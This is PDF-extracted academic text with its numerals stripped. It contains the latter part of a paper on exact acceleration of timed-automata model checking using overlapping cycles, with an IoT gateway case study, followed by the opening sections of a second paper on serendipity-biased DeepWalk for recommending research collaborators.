during forward symbolic reachability analysis. this solution is faster than using two acceleratable cycles simultaneously to obtain a continuous clock zone, and it is better than using the larger one. by extension, when comparing any two acceleratable cycles, a shorter time cycle always obtains a continuous clock zone more quickly. when comparing all acceleratable cycles, we can achieve the most effective acceleratable cycle for exact acceleration. this result indicates that the acceleration effect of a single acceleratable cycle is more effective than that of multiple acceleratable cycles, thereby completing the proof. corollary . let m =(c,l,l ,a,i,e) be a timed automaton with several acceleratable cycles. let cyclei= (eci,x) be the ith acceleratable cycle of m with a window of [ai,bi], where i is a non-zero natural number. all acceleratable cycles affect the cycle of clock x, and their reset locations are uniform in lreset ∈l. if ai <bi, then the acceleratable cycle with the min (⌈ ai bi−ai ⌉ ×ai ) has the best acceleration effect of obtaining a continuous clock zone in the shortest time. proof. according to theorem , comparing any two acceleratable cycles, a cycle with smaller value of (⌈ ai bi−ai ⌉ ×ai ) always obtains a continuous clock zone more quickly. wang et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. when comparing all acceleratable cycles, the cycle with the min (⌈ ai bi−ai ⌉ ×ai ) obviously has the most effective acceleration. the proof is completed. definition (accelerated automaton based on overlapping cycle). let m = (c,l,l ,a,i,e) be a timed automaton with k acceleratable cycles, where l = {l ,l ,...,lm}. cycle ={cycle ,...,cyclek|k ∈n+} denotes the acceleratable cycle set. let cyclei=(eci,x) be the ith acceleratable cycle with a window of [ai,bi], where ≤ i≤k, ec= (e ,e ,...,en− ), eji= (lji,aji,τji,λji,l(j+ )i). all acceleratable cycles affect the cycle of clock x, and their reset locations are uniform in lreset ∈l. the global clock is y, and the maximum value of y before entering the acceleratable cycle is n . the acceleration of m based on the overlapping cycle is a new automaton acco(m,cycle) defined as (c,l′,l ,a,i ′,e′), where • l′=l∪ { l′reset } • i ′(lh)= i(lh), ≤h≤m • i ′ ( l′reset ) =∅ • e′=e∪ {( lreset,∅,τ ′,∅,l′reset ) , ( l′reset,∅,∅,λ ′,lreset )} , τ ′ is y ≥min (⌈ ai bi−ai ⌉ ×ai ) +n and λ′ only contains x. the accelerated automaton acco(m,cycle) equals the timed automaton m with the addition of an overlapping cycle at only one reset location, which solves the problem where an exact acceleration cannot be used directly for complex real-time model checking. the overlapping cycle only needs to analyze all windows of every acceleratable cycle in cycle for the calculation. we can also avoid using an appended cycle or parking cycle for each acceleratable cycle, greatly reducing the additive symbolic state. figure depicts the acceleration of m ′ (fig. ) based on an overlapping cycle, named accelerated automaton m ′ o. because the timed automaton m ′ contains four acceleratable cycles, we analyze them separately, discard the deadlocked cycle, and only retain three executable cycles. the deadlocked cycle consists with location l ,l ,l ,l ,l ,l ,l ,l ,l ,l ,l ,l ,l in sequence. for further analysis, the windows of acceleratable cycles are calculated as [ , ], [ , ], and [ , ]. by taking the minimum value of ⌈ ai bi−ai ⌉ ×ai, we can obtain the overlapping cycle’s entry condition, which is y ≥ . theorem . let m =(c,l,l ,a,i,e) be a timed automaton with several acceleratable cycles. let cyclei = (eci,x) be the ith acceleratable cycle of m with a window of [ai,bi], where i is a non-zero natural number. if x is reset on edge e , then the subsequent states of src(e ) reachable by multiple acceleratable cycles in m, are reachable by exactly one execution of the overlapping cycle in acco(m,cycle). proof. for a certain acceleratable cycle, its window is set as [ a′,b′ ] . according to theorem , when a′≤ b′, the appended cycle does not change the subsequent reachability of the reset location src(e ) in m. according to theorem , when a′≤b′, the parking cycle does not change the subsequent reachability of the reset location src(e ) in m. in the case of multiple acceleratable cycles superimposing on the same location in a complex real-time system, the subsequent reachability of the reset location src(e ) in m can be guaranteed to remain unchanged if any part of the acceleratable cycle is processed with exact acceleration. wang et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure automaton m ′o: acceleration of m ′ based on an overlapping cycle. full-size doi: . /peerjcs. /fig- wang et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table runtime data comparing m ′ and its accelerated versions ma′ , mp′ and mo′ . large mem (kb) , , , , , , m ′ time (s) . . . . . , . mem (kb) , , , , , m ′ a time (s) . . . . . . mem (kb) , , , , , , m ′ p time (s) . . . . . . mem (kb) , , , , , , m ′ o time (s) . . . . . . according totheorem , the accelerablecycle is moreeffective for obtaininga continuous clock zone at reset location src(e ) than multiple acceleratable cycles. in particular, according to corollary , if ai < bi, then the exact acceleration based on overlapping cycle can obtain the continuous clock zone in the shortest time. the proof is completed. this theorem ensures the effectiveness of acceleration. for a single acceleratable cycle, if all states are reachable by more than one execution of the acceleratable cycle, then exactly only one execution of the acceleratable cycle of the appended cycle or parking cycle can guarantee reachability of all states in the accelerative automaton. the complex real-time model checking differs from the exact acceleration of a single acceleratable cycle. in depth-first forward symbolic reachability analysis, it is necessary to verify whether subsequent states are reachable in priority while ignoring the breadth-first search within cycles. in our case study of an iot gateway security system (wang et al., ), the control center must complete a security process and distribute it to each sensor node. once a self-organizing sensor network completes the process, it can respond to the command of the control center in a timely manner. the control center can perform subsequent operations after receiving feedback regardless of whether other sensor nodes can complete the process. hence, the security system must ensure its subsequent reachability regardless of who completes the process. this approach accelerates the search of subsequent states, thus avoiding time and space consumption caused by superposition of acceleratable cycles. experimental results to verify the validity of the exact acceleration method based on an overlapping cycle for complex real-time model checking, we collected runtime data, including memory consumption and verification time, from the timed automaton m ′. we also gathered runtime data from the accelerated automata m ′ a, m ′ p, and m ′ o, which use the appended cycle, parking cycle, and overlapping cycle, respectively. we employed the model-checking tool uppaal with a depth-first search order to verify whether location l was reachable, which can give the time and memory consumption in verification automatically. experimental results are displayed in table . wang et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure technical framework of iot gateway security system. full-size doi: . /peerjcs. /fig- results show that the time consumption of m ′ increased with exponential growth of large at a rate of nearly ten times without using exact acceleration. the memory consumption of m ′ increased slightly because no additional locations were added. the accelerated automaton m ′ a used an appended cycle, which reduced the time consumption, reflecting the advantages of exact acceleration. however, due to a large number of additional locations, the memory consumption of m ′ a increased dramatically. the accelerated automaton m ′ p used a parking cycle to reduce the time consumption further compared to m ′ a. the fixed length of the parking cycle reduced the number of additional locations compared to the appended cycle; accordingly, the memory consumption was much lower for m ′ p than for m ′ a but slightly higher than for m ′. the accelerated automaton m ′ o that used the proposed overlapping cycle exhibited minimal time consumption and only required the addition of a single, fixed-length location for the complex real-time model. the memory consumption of m ′ o was close to that of m ′, far less than that of m ′ a, and slightly better than that of m ′ p. we can explain the time and memory consumption of m ′ o by theorem . the depth-first search order ensures that the overlapping cycle accelerates exploration before complete exploration of all accelerable cycles. a less theoretical study case involves model verification of the iot gateway security system (wang et al., ). the exact acceleration method based on the overlapping cycle was successfully applied in this case, significantly improving verification efficiency. the technical framework of the iot gateway security system is illustrated in fig. . an essential technology in the iot gateway security system is the time-stamped advanced encryption standard algorithm. by introducing a timestamp into the key expansion phase, the round key can be dynamically updated with change over time to realize a cipher text change that ensures the security of confidential information. due to the introduction of a timestamp, the system generates acceleratable cycles when modeled as timed automata. wang et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. multiple acceleratable cycles are overlaid on the same location in particular scenarios, which requires overlapping cycle technology for exact acceleration. our theory can be used to simulated the parallel execution of processes and idle cycles. however, the presence of urgent locations and synchronous channels may disturb exact acceleration. for example, if broadcast channel coordination occurs in an urgent location, the multi-party response of the broadcast should be completed before the next state location can be migrated. the execution time of the response process is not controlled by the cycle control program; thus, it is not appropriate to simply use exact acceleration technology for acceleration; the space–time loss of using acceleration technology should be compared to the broadcasting response. however, exact acceleration technology can often handle urgent locations and synchronous channels. the following case of an iot gateway security system also involves these situations. as no extra time interference exists within the whole acceleration process, the exact acceleration technology can finally be successfully applied to system modeling and verification. the accelerated automaton based on an overlapping cycle is an approximation that can be adapted to verify the accuracy of invariance and reachability properties. consider the processes in fig. ; these processes model a top architecture and a middleware control program consisting of locations, edges, and channels. the iot gateway runs from the start location, reads configuration information and performs gateway identity authentication. the underlying unified authentication service is invoked through channel startac for security authentication, and gatewaystatus is returned after authentication. if gatewaystatus =true, then the system enters the location entermiddle and transforms to the polling module of the middle layer through the startmiddle channel. for the middle-layer polling module, polling begins through the startmiddle channel, and the top-layer main module is returned by the finishmiddle channel. location checkcategory controls whether polling logic ends up at a perception terminal or an execution terminal, which each have different processing methods. in the two polling processes, the underlying security service is invoked through the synchronization channel according to different requirements. the specific process can be interpreted by the meaning of state locations, synchronization channels, and variables as described by wang et al. ( ). in particular, clock constraints are added during the stage of waiting for timing and the stage of keeping the equipment running. the top-layer main module model and middle-layer polling module model constitute the general framework of the iot gateway security system. security implementation depends on the underlying security service modules ultimately, hence it is necessary to improve model construction of the underlying security service modules. for complex system modeling with underlying services, we apply the exact acceleration method proposed in this paper, which can effectively improve the verification speed. to demonstrate the effect of exact acceleration, we checked all security properties of the iot gateway security system model in fig. . several examples are presented below. ( ) a[] not deadlock property is used to check deadlock and ensure all state locations will be reachable. ( ) e<>top.checkgs wang et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure part of the iot gateway security system model. full-size doi: . /peerjcs. /fig- ( ) e<>top.entermiddle imply middle.checkcategory properties and are used to explore part of the state space. the truth of these two properties indicates that the implementation accelerated model is an exact acceleration with the overlapping cycle. ( ) a[] top.restart imply c<= ( ) a[] top.record imply c<= ( ) a[] middle.retrievedata imply middle.y>= ( ) a[] middle.waitdevice imply middle.y<= properties – are examined in terms of whether subsequent states of the reset location are reachable. clock c is a global clock and clock y is used to model the duration of one process. we measured time and memory consumption and explored states for these properties. the iot gateway security system was modeled as a timed automaton miot , and the acceleration of miot with overlapping cycles was modeled as an automaton mioto. we used model checkers uppaal and kronos to verify security system properties automatically, such as confidentiality, availability, and authenticity in parallel processes. kronos is able wang et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table runtime data comparing miot and mioto. explored states time(s) memory(kb) miot , . , mioto , . , table comparing the performance of different exact acceleration techniques for large-scale iot sys- tems. system states-scale exact acceleration technique verification time(s) appended cycle . parking cycle . overlapping cycle . appended cycle ∞ parking cycle . overlapping cycle . parking cycle . overlapping cycle . parking cycle ∞ overlapping cycle . to complete the statistics of the state scale traversed by the whole verification process. it makes up for the fact that uppaal can’t do this. table lists the experimental results. on the premise of guaranteeing the security of iot gateway system, a large number of underlying services and various applications can be embedded in the system framework. at this time, the security requirements of iot gateway system are mainly for various new access services, and the framework security of the gateway itself can be maintained by its own mechanism. after access to a large number of services and applications, the original model will become complex, concurrent, real-time with large-scale. the verification of the system needs to be processed by the exact acceleration method based on overlapping cycle. with the increase of the number of access services, the system model becomes more and more complex, and the scale of access number greatly affect the efficiency of model verification. appended cycle and parking cycle methods are more suitable for single accelerating cycle scenarios. in this complex scenario, when the number of services reaches a certain level, the acceleration process may not be completed. according to the change of the number of access services, table gives the comparison of the acceleration effects of different exact acceleration methods (from the perspective of time). the results show that for complex real-time systems, the acceleration efficiency of overlapping cycle is much higher than that of appended cycle and parking cycle, and the verification can still be completed when the state scale reaches with proposed method. so, the exact accelerating technology substantially reduced the time required for verification in complex real-time model checking. overlapping cycle acceleration demonstrated the highest efficiency compared to the appended cycle and parking cycle. in the simple example of automaton m ′ in fig. , additional locations were required when using the appended wang et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. cycle, much higher than the number of locations in the original model. although the appended cycle reduced verification time, it increased the difficulty of adding locations to the model in an early stage. when many acceleratable cycles were stacked in the same reset position, more than one location needed to be added to m ′ when the parking cycle was used, although the length of the parking cycle was fixed. the parking cycle was neither simpler nor faster than the overlapping cycle, and its previous calculation was larger than that of the overlapping cycle. with the exception of this iot case, our approach can be applied to other scenarios, such as security validation of blockchain smart contracts. the complete code and uppaal model can be found at https://github.com/iegqwang/uppaal. conclusions to solve the fragmentation problem for complex real-time model checking, we propose an exact acceleration method based on an overlapping cycle, which is an application scenario extension of parking-cycle technique, to accelerate forward symbolic reachability analysis. compared with the appended cycle or parking cycle for exact acceleration, the proposed method can be applied to the model acceleration of large-scale complex real-time systems and only requires the addition of a single, fixed-length location to the system’s timed automaton model. the addition of an overlapping cycle introduces far fewer symbolic states than using either an appended cycle or parking cycle. rather than relying on windows of acceleratable cycles, the proposed accelerated automaton model is more straightforward and reduces the space–time overhead of exact acceleration. two aspects warrant exploration in future research. first, we must continue to study the algorithm for the acceleratable cycle, try to simplify the original automaton model, guarantee its original property, and rapidly identify the deadlock. second, we plan to develop a simple exact acceleration automatic checking platform that can consider other practical conditions such as action transitions, urgent locations, and synchronous channels to solve actual modeling problems more efficiently. additional information and declarations funding this work was supported by the key program of the national natural science foundation of china (no. u ), the key scientific research project of higher education of henan (no. a , a and a ), and the key r&d and promotion project in science and technology of henan (no. ). the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: key program of the national natural science foundation of china: u . wang et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/iegqwang/uppaal http://dx.doi.org/ . /peerj-cs. key scientific research project of higher education of henan: a , a , a . key r&d and promotion project in science and technology of henan: . competing interests the authors declare there are no competing interests. author contributions • guoqing wang conceived and designed the experiments, performed the experiments, performed the computation work, prepared figures and/or tables, and approved the final draft. • lei zhuang conceived and designed the experiments, performed the computation work, prepared figures and/or tables, and approved the final draft. • yu song analyzed the data, authored or reviewed drafts of the paper, and approved the final draft. • mengyang he performed the experiments, analyzed the data, prepared figures and/or tables, and approved the final draft. • ding ma performed the experiments, performed the computation work, authored or reviewed drafts of the paper, and approved the final draft. • ling ma analyzed the data, authored or reviewed drafts of the paper, and approved the final draft. data availability the following information was supplied regarding data availability: codes are available at github: https://github.com/iegqwang/uppaal. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references aceto l, bouyer p, burgueño a, larsen kg. . the power of reachability testing for timed automata. theoretical computer science ( ): – doi . /s - ( ) - . alur r, dill dl. . a theory of timed automata. theoretical computer science ( ): – doi . / - ( ) - . barnat j, bauch p, brim l, Češka m. . employing multiple cuda devices to accel- erate ltl model checking. in: international conference on parallel and distributed systems, . piscataway: ieee, – doi . /icpads. . . behrmann g, bouyer p, larsen kg, pelánek r. . lower and upper bounds in zone- based abstractions of timed automata. international journal on software tools for technology transfer ( ): – doi . /s - - - . wang et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/iegqwang/uppaal http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . / - ( ) - http://dx.doi.org/ . /icpads. . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /peerj-cs. behrmann g, david a, larsen kg. . a tutorial on uppaal. in: international school on forman methods for the design of computer, communication and software systems, . berlin: springer verlag, – doi . / - - - - _ . boudjadar a, david a, kim jh, larsen kg, mikučionis m, nyman u, skou a. . statistical and exact schedulability analysis of hierarchical scheduling systems. science of computer programming : – doi . /j.scico. . . . chadli m, kim jh, larsen kg, legay a, naujokat s, steffen b, traonouez lm. . high-level frameworks for the specification and verification of scheduling problems. international journal on software tools for technology transfer ( ): – doi . /s - - - . chen h, cui l. . design and model checking of service-oriented software architec- ture for internet of things: a survey. chinese journal of computers ( ): – doi . /sp.j. . . . cruz jp, kaji y, yanai n. . rbac-sc: role-based access control using smart contract. ieee access : – doi . /access. . . dubout c, fleuret f. . accelerated training of linear object detectors. in: com- puter vision and pattern recognition workshops, . piscataway: ieee, – doi . /cvprw. . . gou l, li z, wang c, zhuang l. . a method to determine the exact acceleration efficiency in model checking. journal of zhongyuan university of technology ( ): – doi . /j.issn. - . . . . grishchenko i, maffei m, schneidewind c. . foundations and tools for the static analysis of ethereum smart contracts. in: computer aided verification, . berlin: springer verlag, – doi . / - - - - _ . han d, yang q, xing j. . uml-based modeling and formal verification for software self-adaptation. journal of software ( ): – doi . /j.cnki.jos. . hendriks m, larsen kg. . exact acceleration of real-time model checking. electronic notes in theoretical computer science ( ): – doi . /s - ( ) - . herbreteau f, srivathsan b, walukiewicz l. . better abstractions for timed automata. information and computation : – doi . /j.ic. . . . iversen tk, kristoffersen kj, larsen kg, laursen m, madsen rg, mortensen sk, pettersson p, thomasen cb. . model-checking real-time control programs: verifying lego r© mindstromstm systems using uppaal. in: euromicro conference on real-time systems, . piscataway: ieee, – doi . /emrts. . . jeong h, yoo y, yi km, choi jy. . two-stage online inference model for traf- fic pattern analysis and anomaly detection. machine vision and applications ( ): – doi . /s - - . konur s, fisher m, schewe s. . combined model checking for temporal, probabilistic, and real-time logics. theoretical computer science : – doi . /j.tcs. . . . wang et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . /j.scico. . . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /sp.j. . . http://dx.doi.org/ . /access. . http://dx.doi.org/ . /cvprw. . http://dx.doi.org/ . /j.issn. - . . . http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . /j.cnki.jos. http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /j.ic. . . http://dx.doi.org/ . /emrts. . http://dx.doi.org/ . /s - - http://dx.doi.org/ . /j.tcs. . . http://dx.doi.org/ . /peerj-cs. lee j, yu s, park k, park y, park y. . secure three-factor authentication protocol for multi-gateway iot environments. sensors ( ): – doi . /s . li g, wei q, li l, jin z, xu y, zheng l. . environment based modeling approach for services in the internet of things. science china press ( ): – doi . /n - . lin k, chen y, xu d. . reliability assessment model considering heterogeneous population in a multiple stresses accelerated test. reliability engineering & system safety : – doi . /j.ress. . . . möller mo. . parking can get you there faster: model augmentation to speed up real-time model checking. electronic notes in theoretical computer science ( ): – doi . /s - ( ) - . pinisetty s, jéron t, tripakis s, falcone y, marchand h, preoteasa v. . pre- dictive runtime verification of timed properties. journal of systems and software : – doi . /j.jss. . . . qanadilo m, samara s, zhao y. . c. in: latin-american symposium on dependable computing, . piscataway: ieee, – doi . /ladc. . . wang c, pastore f, briand l. . oracles for testing software timeliness with un- certainty. acm transactions on software engineering and methodology ( ): – doi . / . wang g, zhuang l, wang r, song y, zhang k. . modeling and verifying based on timed automata of internet of things gateway security system. journal on communications ( ): – doi . /j.issn. - x. . wang h, zhong d, zhao t, ren f. . integrating model checking with sysml in complex system safety analysis. ieee access : – doi . /access. . . yin c, song w, zhuang l. . method of acceleratable cycles in identify timed automata. computer engineering and design ( ): – doi . /j.issn - . . . . yin c, zhuang l, wang c. . exact acceleration of real-time model checking based on parking cycle. acta electronica sinica ( ): – doi . /j.issn. - . . . . zhang f, bu l, wang l, zhao j, li x. . modeling and analysis of wireless sensor network protocols by stochastic timed automata and statistical model checking. scientia sinica informationis ( ): – doi . / - . wang et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /s http://dx.doi.org/ . /n - http://dx.doi.org/ . /j.ress. . . http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /j.jss. . . http://dx.doi.org/ . /ladc. . http://dx.doi.org/ . / http://dx.doi.org/ . /j.issn. - x. http://dx.doi.org/ . /access. . http://dx.doi.org/ . /j.issn - . . . http://dx.doi.org/ . /j.issn. - . . . http://dx.doi.org/ . / - http://dx.doi.org/ . /peerj-cs. submitted october accepted february published march corresponding author liangtian wan, wan.liangtian. @ieee.org academic editor diego amancio additional information and declarations can be found on page doi . /peerj-cs. copyright xu et al. distributed under creative commons cc-by . open access a serendipity-biased deepwalk for collaborators recommendation zhenzhen xu, yuyuan yuan, haoran wei and liangtian wan key laboratory for ubiquitous network and service software of liaoning province, school of software, dalian university of technology, dalian, liaoning, china abstract scientific collaboration has become a common behaviour in academia. various recommendation strategies have been designed to provide relevant collaborators for the target scholars. however, scholars are no longer satisfied with the acquainted collaborator recommendations, which may narrow their horizons. serendipity in the recommender system has attracted increasing attention from researchers in recent years. serendipity traditionally denotes the faculty of making surprising discoveries. the unexpected and valuable scientific discoveries in science such as x-rays and penicillin may be attributed to serendipity. in this paper, we design a novel recommender system to provide serendipitous scientific collaborators, which learns the serendipity-biased vector representation of each node in the co-author network. we first introduce the definition of serendipitous collaborators from three components of serendipity: relevance, unexpectedness, and value, respectively. then we improve the transition probability of random walk in deepwalk, and propose a serendipity-biased deepwalk, called seren vec. the walker jumps to the next neighbor node with the proportional probability of edge weight in the co-author network. meanwhile, the edge weight is determined by the three indices in definition. finally, top-n serendipitous col- laborators are generated based on the cosine similarity between scholar vectors. we conducted extensive experiments on the dblp data set to validate our recommendation performance, and the evaluations from serendipity-based metrics show that seren vec outperforms other baseline methods without much loss of recommendation accuracy. subjects data mining and machine learning, data science, network science and online social networks, social computing keywords deepwalk, collaborators recommendation, serendipity, vector representation learning, scholarly big data introduction in academia, the rapid accumulation of scholarly data has produced an overload of academic information, and scholars are lost in it because of the difficulty in accessing useful information. the appearance of a recommender system alleviates the problem, i.e., providing relevant collaborators for target scholars, which focuses on improving the recommendation accuracy. most recommendation approaches build the profiles of target scholars based on their interests or research contents, and then provides a list of collaborators who have similar profiles with them. however, researchers are no longer satisfied with the relevant or acquainted recommendations, which may narrow their horizons in the long term. furthermore, how to cite this article xu z, yuan y, wei h, wan l. . a serendipity-biased deepwalk for collaborators recommendation. peerj comput. sci. :e http://doi.org/ . /peerj-cs. https://peerj.com mailto:wan.liangtian. @ieee.org https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://doi.org/ . /peerj-cs. accuracy is not the absolute metric in determining good recommendation performance, and it sometimes hurts the recommender systems for lacking novelty and diversity (sean, mcnee & konstan, ; mcnee, riedl & konstan, ). under this circumstance, serendipity is taken into consideration in terms of satisfying users when designing or evaluating the recommender systems (kotkov, wang & veijalainen, ). the concept of serendipity can be understood flexibly in most cases, which has different implications under different scenarios. additionally, the serendipitous encounters are rare in both academia and daily life of researchers. therefore, no consensus is reached on the definition of serendipity. in this paper, we aim to recommend the serendipitous scientific collaborators for target scholars by learning the vector representation of each scholar node in co-author network. the first essential step of this work is the definition of serendipitous collaborators. we induce the definition by three components of serendipity, which are relevance, unexpectedness, and value, respectively. relevance is quantified as the proximity between two connected nodes in co-author network. unexpected collaborators have research topics that are different from the topics of their target scholars; therefore, they usually have diverse research topics compared with their target scholars. while the value of a collaborator is quantified as the eigenvector (bonacich, ) of the collaborator node in the co-author network, which represents the influence of this collaborator. according to the nature of serendipity, we define that serendipitous collaborators are more unexpected and valuable, but less relevant for their target scholars. we reserve lower relevance for the significance of serendipity, because relevance caters to the preferences of target scholars. while the core components of serendipity are unexpectedness and value. consequently, the intuitive definition is that a serendipitous collaborator has high topic diversity, high influence and low network proximity relatively for his/her target scholar. the second essential step is the design of appropriate recommendation algorithm. though collaborative filtering is the most universal recommendation approach (kim et al., ; konstas, stathopoulos & jose, ), it is not yet applicable to our recommendation scenario. recently, researchers have shown increasing interest in the technology of network embedding. the vector representations of network nodes have also been applied to many prediction and recommendation tasks by learning relevant features of nodes successfully (perozzi, al- rfou & skiena, ; grover & leskovec, ; tian & zhuo, ). in this case, we design a serendipitous collaborators recommendation strategy by improving deepwalk (perozzi, al-rfou & skiena, ), where the walker jumps to the next node based on the proportional probability of its edge weight with the connected node in co-author network. besides, the edge weight between a collaborator and his/her target scholar is determined by the extent of serendipity. therefore, this is a serendipity-biased deepwalk for learning the vector representation of each author node in co-author network, and we call it seren vec. seren vec embeds each author node with a low-dimensional vector that carries serendipity between collaborators in the co-author network. we extract top-n collaborators for recommendation based on the cosine similarity between author vectors. to the best of our knowledge, this is the first work that takes serendipity into consideration when designing the collaborators recommender system. our strategy enabled us to simultaneously improve the serendipity of the recommendation list and to maintain xu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. adequate accuracy. the definition of serendipitous collaborators is also significant for further mining the interesting collaboration mechanism in science. the main contributions of this paper can be summarized as follows: • define serendipitous scientific collaborators: we propose the intuitive definition of serendipitous scientific collaborators from three indices, which are network proximity, topic diversity, and collaborator influence, respectively. • propose a serendipity-biased deepwalk (seren vec): we improve the process of random walk in deepwalk for serendipitous collaborators recommendation. the walker jumps to the next neighbor node with the proportional probability of its edge weight with the connected node, and the edge weight is determined by the extent of serendipity. therefore, the vector representation of each author node is serendipity-biased. • recommend serendipitous scientific collaborators: we perform seren vec to learn the representation of each author node with low-dimensional vector, and then extract the top-n similar collaborators by computing the cosine similarity between the target vector and other author vectors. • analyze and evaluate the recommendation results: we conduct extensive experiments on the subset of dblp, and evaluate the recommendation results from both accuracy- based and serendipity-based metrics. furthermore, we compare the recommendation performance of seren vec with other baseline methods for validating our scheme. in the following sections: we first briefly review the related work, including the widely used collaborators recommendation approaches and the integration of serendipity in recommender systems. the proposed definition of serendipitous scientific collaborators and the corresponding indices are analyzed and quantified in ‘the definition of serendipitous collaborators’. the framework of our method is discussed in ‘the framework of seren vec’. the experimental results and metrics for evaluation are presented in ‘experiments’. finally we conclude the paper in the last section. related work researchers have designed various academic recommender systems for scientific applications. however, most existing recommendation approaches aim to improve the recommendation accuracy based on the profile similarity between users. long-term use of such recommender systems will degrade the user satisfaction, since most recommendations are the acquaintances of target users. the serendipity-related elements have attracted increasing attention from researchers for designing serendipitous recommender systems, such as novelty, unexpectedness, diversity, etc. in this section, we summarize the widely used collaborators recommendation approaches, the existing technologies for integrating serendipity into recommendation systems, and the serendipity-based metrics for evaluating the recommendation results. xu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. scientific collaborators recommender systems methods for recommending scientific collaborators have been studied for decades. the recommendation methods can be divided into content-based, collaborative filtering-based, and random walk-based algorithms on the whole. content-based recommendation content-based method is a basic and widely used technique for recommending collaborators. the critical process of content-based collaborators recommendation is the scholar profile modelling, where the interests or topics of scholars can be inferred from their publication contents by extracting the words from title, abstract, keywords, etc. many topic modeling techniques such as word vec (goldberg & levy, ), lda (latent dirichlet allocation) (blei, ng & jordan, ) and plsa (probabilistic latent semantic analysis) (hofmann, ) enable to generate the probability distribution of these words, and they also contribute to generate the feature descriptions of different scholars. a collaborator recommendation list is finally generated by computing the profile similarity between scholars. gollapalli, mitra & giles ( ) proposed a recommendation model by computing the similarity between expertise profiles. besides, the expertise profiles are extracted from researchers’ publications and academic home pages. lopes et al. ( ) took the area of researchers’ publications and the vector space model to make collaboration recommendation. the scientific collaboration mechanism is complex for the various factors. wang et al. ( ) investigated the academic-age-aware collaboration behaviors, which may guide and inspire the collaborators recommendation strategies. collaborative filtering-based recommendation collaborative filtering-based method is popular in the field of recommender system. the core of collaborative filtering is to find items via the opinions of other similar users whose previous history strongly correlates with the target user. in other words, the similar users have similar interests with the target user (jannach et al., ). finally, the items positively rated by the similar users will be recommended to the target user. heck, peters & stock ( ) performed a collaborative filtering method via the co-citation and bibliographic coupling to detect author similarity. however, the cold start problem exists to degrade the recommendation performance, because it is difficult to find similar scholars without enough information of a new scholar. content-based algorithms require contents to analyze by utilizing natural language processing (nlp) tools, therefore the collaborative filtering-based algorithms are more easy to implement without the requirement of contents (hameed, al jadaan & ramachandram, ). random walk-based recommendation random walk is the most common technique for collaborators recommendation. the basic idea of random walk is to compute the structure similarity between nodes in co-author network based on the transition probability. xia et al. ( ) explored three academic factors, i.e., coauthor order, latest collaboration time, and times of collaboration, to quantify the link importance and performed a biased random walk in academic social network for recommending most valuable collaborators. araki et al. ( ) made use of xu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. both topic model and random walk with restart method for recommending interdisciplinary collaborators. they combined the content-based and random-walk based methods for collaborators recommendation. kong’s works (kong et al., ; kong et al., ) exploited the dynamic research interests, academic influences and publication contents of scholars for collaborators recommendation. random walk can be improved flexibly by adjusting its transition matrix, therefore it have been widely used by researchers in their recommendation scenarios. to sum up, all kinds of recommendation algorithms are designed based on the similarity between academic entities in order to enhance the recommendation accuracy. most of them ignore the integration of other serendipity-related elements for the design of recommender systems. consequently, they are not applicable to our task of recommending serendipitous collaborators. serendipity in recommender systems increasing researchers are interested in investigating serendipity in recommender systems, kotkov, wang & veijalainen ( ) wrote a survey to summarize the serendipity problem in recommender systems, including the related concepts, the serendipitous recommendation technologies and metrics for evaluating the recommendation results. they also analyzed the challenges of serendipity in recommender systems (kotkov, veijalainen & wang, ). herlocker et al. ( ) considered that serendipitous recommendations aim to help users finding interesting and surprising items that they would not discover by themselves. while shani and gunawardana (shani & gunawardana, ) described that serendipity associates with users’ positive emotions on the novel items. the serendipitous items usually are unexpected and useful simultaneously for a user (manca, boratto & carta, ; iaquinta et al., ). from these perspectives, serendipity emphasizes the unexpectedness and value components. serendipitous recommendation approaches various serendipity-enhancement approaches have been proposed by researchers. zhang & hurley ( ) suggested to maximize the diversity of the recommendation list and kept adequate similarity to the user query for avoiding monotonous recommendations. zhang et al. ( ) proposed a full auralist recommendation algorithm in order to balance the accuracy, diversity, novelty and serendipity of recommendations simultaneously. however, the auralist algorithm is difficult to realize for its complexity. said et al. ( ) proposed a new k-furthest neighbor (kfn) recommendation algorithm in order to recommend novel items by selecting items which are disliked by dissimilar users. onuma, tong & faloutsos ( ) proposed a novel tangent algorithm to broaden user tastes, and they aim to recommend the items in a graph that not only are relevant to the target 